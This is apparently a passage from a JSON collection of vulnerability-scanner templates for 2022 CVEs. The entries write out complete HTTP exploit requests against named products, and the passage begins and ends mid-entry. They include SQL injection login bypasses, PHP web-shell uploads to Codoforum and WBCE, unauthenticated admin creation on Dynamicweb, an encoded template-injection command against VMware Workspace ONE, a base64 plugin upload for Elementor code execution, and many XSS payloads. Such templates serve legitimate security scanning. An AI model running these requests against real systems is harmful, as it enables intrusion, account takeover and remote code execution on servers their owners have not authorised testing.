application/x-www-form-urlencoded\n\nusername=admin'+or+'1'%3D'1'%23&password=admin\n","GET /admin/index.php?page=home HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome back Administrator!","action=logout","Manage Account"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31854","info":{"name":"Codoforum 5.1 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /admin/?page=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryACGPpj7UIqmtLNbB\n\n------WebKitFormBoundaryACGPpj7UIqmtLNbB\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundaryACGPpj7UIqmtLNbB\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundaryACGPpj7UIqmtLNbB--\n","GET /admin/index.php?page=config HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/index.php?page=config HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoLtdjuqj2ixPvBhA\n\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"site_title\"\n\n\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"forum_logo\"; filename=\"{{randstr}}.php\"\nContent-Type:  application/x-httpd-php\n\n<?php\n\necho md5('CVE-2022-31854');\n\n?>\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"CSRF_token\"\n\n{{csrf}}\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA--\n","GET /sites/default/assets/img/attachments/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(content_type_4, \"text/html\")","contains(body_4, \"a63fd49130de6406a66600cd8caa162f\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"CSRF_token\" value=\"([0-9a-zA-Z]+)\"/>"],"internal":true}]}]},{"id":"CVE-2022-1815","info":{"name":"Drawio <18.1.2 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /service/0/test.oast.me HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, 'Interactsh Server')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2022-29006","info":{"name":"Directory Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=admin' or '1'='1&password=1&login=login\n","GET /admin/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DMS || Dashboard","DMS Admin","Admin Profile"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0595","info":{"name":"WordPress Contact Form 7 <1.3.6.3 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------92633278134516118923780781161\n\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"size_limit\"\n\n10485760\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"action\"\n\ndnd_codedropz_upload\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"type\"\n\nclick\n-----------------------------92633278134516118923780781161\nContent-Disposition: form-data; name=\"upload-file\"; filename=\"{{randstr}}.svg\"\nContent-Type: image/jpeg\n\n<svg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(document.domain)\"/>\n-----------------------------92633278134516118923780781161--\n","GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.svg HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"alert(document.domain)\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-25369","info":{"name":"Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"Success\": true","\"Success\":true"],"condition":"or"},{"type":"word","part":"header","words":["application/json","ASP.NET_SessionId"],"condition":"and","case-insensitive":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28023","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Master.php?f=delete_supplier HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nid=aman'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"status\\\":\\\"success\")"],"condition":"and"}]}]},{"id":"CVE-2022-45917","info":{"name":"ILIAS eLearning <7.16 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/shib_logout.php?action=logout&return=https://example.com","{{BaseURL}}/ilias/shib_logout.php?action=logout&return=https://example.com"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)example\\.com\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-0599","info":{"name":"WordPress Mapping Multiple URLs Redirect Same Page <=5.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mmursp-list&view=edit&mmursp_id=\"><svg/onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")"],"condition":"and"},{"type":"word","part":"body","words":["id=\"mmursp_id\" value=\"\\\"><svg/onload=alert(document.domain)>\" />"]}]}]},{"id":"CVE-2022-46020","info":{"name":"WBCE CMS v1.5.4 -  Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/settings/index.php?advanced=yes HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/settings/save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadvanced=yes&formtoken={{formtoken}}&website_title=test&website_description=&website_keywords=&website_header=&website_footer=&page_level_limit=4&page_trash=inline&page_languages=false&multiple_menus=true&home_folders=true&manage_sections=true&section_blocks=true&intro_page=false&homepage_redirection=false&smart_login=true&frontend_login=false&redirect_timer=1500&frontend_signup=false&er_level=E0&wysiwyg_editor=ckeditor&default_language=EN&default_charset=utf-8&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&search_footer=&search_max_excerpt=15&search_time_limit=0&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&pages_directory=%2Fpages&media_directory=%2Fmedia&page_extension=.php&rename_files_on_upload=\n","POST /modules/elfinder/ef/php/connector.wbce.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------213974337328367932543216511988\n\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"reqid\"\n\ntest\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"cmd\"\n\nupload\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"target\"\n\nl1_Lw\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php\n\necho md5(\"CVE-2022-46020\");\n\n?>\n\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"mtime[]\"\n\ntest\n-----------------------------213974337328367932543216511988--\n","GET /media/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_6","words":["751a8ba516522786d551075a092a7a84"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"app_name","group":1,"regex":["name=\"app_name\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-32024","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /booking.php?car_id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22954","info":{"name":"VMware Workspace ONE Access - Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Authorization context is not valid"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-1442","info":{"name":"WordPress Metform <=2.1.3 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/metform/v1/forms/get/{{id}} HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["mf_recaptcha_secret_key","admin_email_from"],"condition":"and"},{"type":"word","part":"header_2","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["<option value=\\\"([0-9]+)\\\""],"internal":true}]}]},{"id":"CVE-2022-42096","info":{"name":"Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/post HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/post HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryIubltUxssi0yqDjp\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"title\"\n\n{{randstr}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_tags[und]\"\n\n{{randstr}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][summary]\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][value]\"\n\n<img src=x onerror=alert(document.domain)>\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][format]\"\n\nfull_html\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_image[und][0][fid]\"\n\n0\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_image[und][0][display]\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"changed\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_build_id\"\n\n{{form_id_1}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_token\"\n\n{{form_token}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_id\"\n\n{{form_id_2}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"status\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"scheduled[date]\"\n\n2023-04-25\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"scheduled[time]\"\n\n16:59:23\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"promote\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"name\"\n\n{{name}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"date[date]\"\n\n2023-04-24\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"date[time]\"\n\n16:59:23\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"path[auto]\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"comment\"\n\n2\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"additional_settings__active_tab\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"op\"\n\nSave\n------WebKitFormBoundaryIubltUxssi0yqDjp--\n","GET /?q=posts/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=\"x\" onerror=\"alert(document.domain)\" />","Backdrop CMS"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"name","group":1,"regex":["name=\"name\" value=\"(.*?)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-4321","info":{"name":"PDF Generator for WordPress < 1.1.2 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php?keyword=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","pdf-generator-for-wp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44950","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"entities_id\"\n\n24\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"forms_tabs_id\"\n\n29\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"name\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"short_name\"\n\ntest\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"type\"\n\nfieldtype_input\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[width]\"\n\ninput-small\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[default_value]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[is_unique]\"\n\n0\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"fields_configuration[unique_error_msg]\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"required_message\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"tooltip_item_page\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access_template\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[5]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"access[4]\"\n\nyes\n------WebKitFormBoundaryfKx13B5QBU5Sccgf\nContent-Disposition: form-data; name=\"notes\"\n\n\n------WebKitFormBoundaryfKx13B5QBU5Sccgf--\n"],"cookie-reuse":true,"redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-2383","info":{"name":"WordPress Feed Them Social <3.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)><br/>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2376","info":{"name":"WordPress Directorist <7.3.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=directorist_author_pagination"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["directorist-authors__card__details__top","directorist-authors__card__info-list"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29775","info":{"name":"iSpy 7.2.2.0 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/logfile?d=crossdomain.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Log Start","Log File","iSpy"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1329","info":{"name":"Elementor Website Builder - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/ HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=336b29d7aee0463d8b651303eab505ea\n\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"action\"\n\nelementor_upload_and_install_pro\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"_nonce\"\n\n{{nonce}}\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{randstr}}.zip\"\n\n{{base64_decode(\"UEsDBBQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAZWxlbWVudG9yLXByby9VVA0AB8csB2TILAdkxywHZHV4CwABBOgDAAAE6AMAAFBLAwQUAAgACAB8KGdWAAAAAAAAAAA6BAAAHwAgAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAKVSXU/bQBB8rn/FgqryoXyUoFZqKAUTnBCJhshxQKiq0Nlex6ee705354T8++45AfLQ9qVv9u3s7OzMfr3QpQ66x8cBHMNU1AsuYcIq7EMksELplIGpUb56jTYzXDuuZB+SEncQD5ha7hCuai5yNFAyC9wBE6IPuWELYDKnD6VBswVCuoG1QPNnFKDRFJg5yNHyhWxBpVIuEAxaraTlSwTMueNy0Wp4KmWwAyN0YB0zDnOQarW3o38ej/tQOqdtv9vFF5GdTFXdi9pVT1bVJsPzlW7rpsF+8K8ZqzSj+eebx3ZtePNe0fC68uic2dKPCWtXKrPjkKf2hXs0tnHntPO5c/IG/V9FrGH5uyI/KcFnB9eqYpzmv47YFi81y35556OdAlxmzOFCmTUMyNIt9C1UbqEwiGBV4VbM0EmsVQ0Zk5RMzq0zPK0pc5+zzLvUUKmcF2tPQm+19Ifg6EwcmsqCKpqf0WRO0Uk0TMC0TgXP4JZnKC0C3Yz2L7akSNOGx3cMvYbZVgMMFREzf4MtQE51A8uN63D6MmNL2ILNmkyuQdCmr8jOn1Z92ygHuiHPUypN6kvm/D4rLgSkCLXFohYt309geBgnN3fzBMLJIzyEcRxOksczAlNgVMUlbqh4pQUnZtrBMOnWJNUzfI/iwQ21hFfj23HySIJhOE4m0WwGw7sYQpiGcTIezG/DGKbzeHo3izowQ6/K5/UvN4smEHIsR8e4sH7pbhAEvIDDPW4tusP3T6Mo+XHAMseX5M/Bz6Oj4J1BVxt5FgSYlQqq/NPh/uA+avc+9nrtk9Pel/0jqgUX34LfUEsHCH5L6n9mAgAAOgQAAFBLAQIUAxQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAAAAAAAAAAAD9QQAAAABlbGVtZW50b3ItcHJvL1VUDQAHxywHZMgsB2THLAdkdXgLAAEE6AMAAAToAwAAUEsBAhQDFAAIAAgAfChnVn5L6n9mAgAAOgQAAB8AIAAAAAAAAAAAALSBTAAAAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAFBLBQYAAAAAAgACAMkAAAAfAwAAAAA=\")}}\n--336b29d7aee0463d8b651303eab505ea--\n","GET /index.php?activate=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["5f9bc5edd71c78284dabe630df8cd71d"]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["admin-ajax.php\",\"nonce\":\"([0-9a-zA-Z]+)\"}"],"internal":true}]}]},{"id":"CVE-2022-23898","info":{"name":"MCMS 5.2.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /cms/content/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncategoryId=1' and updatexml(1,concat(0x7e,md5({{num}}),0x7e),1) and 'zzz'='zzz\n"],"matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]}]}]},{"id":"CVE-2022-48012","info":{"name":"OpenCATS 0.9.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /index.php?m=settings&a=ajax_tags_upd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntag_title=<script>alert(document.domain);</script>\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(body_1, \"opencats - Login\")","contains(body_3, \"<script>alert(document.domain);</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-40359","info":{"name":"Kae's File Manager <=1.4.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /kfm/index.php/'<script>alert(document.domain);</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","x_kfm_changeCaption","kfm_copyFiles"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4050","info":{"name":"WordPress JoomSport <5.2.8 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmdId=1&shattr={\"id\":\"1+AND+(SELECT+1+FROM(SELECT+SLEEP(4))aaaa);--+-\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"jscaruselcont jsview2\")"],"condition":"and"}]}]},{"id":"CVE-2022-0870","info":{"name":"Gogs <0.12.5 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/migrate HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/migrate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&clone_addr=https%3A%2F%2F{{interactsh-url}}&auth_username=&auth_password=&uid=1&repo_name={{randstr}}&description=test\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-43017","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=1&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=15)\"></a><script>alert(document.domain)</script>&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","CATS="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34046","info":{"name":"WAVLINK WN533A8 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /sysinit.shtml?r=52300 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var syspasswd=\"","<title>APP</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["syspasswd=\"(.+?)\""]}]}]},{"id":"CVE-2022-1937","info":{"name":"WordPress Awin Data Feed <=1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=get_sw_product&title=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, 